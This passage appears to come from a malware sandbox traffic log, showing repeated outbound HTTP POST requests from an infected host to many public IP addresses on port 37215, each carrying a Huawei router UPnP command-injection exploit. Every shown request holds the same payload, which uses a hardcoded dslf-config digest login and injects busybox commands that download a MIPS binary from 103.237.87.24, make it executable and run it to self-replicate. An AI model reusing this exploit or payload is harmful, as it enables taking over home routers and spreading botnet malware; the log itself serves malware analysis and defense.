3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2090192.168.2.1350340157.132.73.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579643965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2091192.168.2.133662450.5.183.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579644918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2092192.168.2.1335968197.252.7.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579668045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2093192.168.2.1338370157.15.244.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579668999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2094192.168.2.134811883.69.50.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.579688072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2095192.168.2.1354084197.27.106.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.580543995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2096192.168.2.133909440.97.5.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.580579042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2097192.168.2.1339774197.38.217.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581566095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2098192.168.2.1341172157.244.60.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581660986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2099192.168.2.136080841.47.8.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581677914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2100192.168.2.1335436197.105.164.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.581697941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
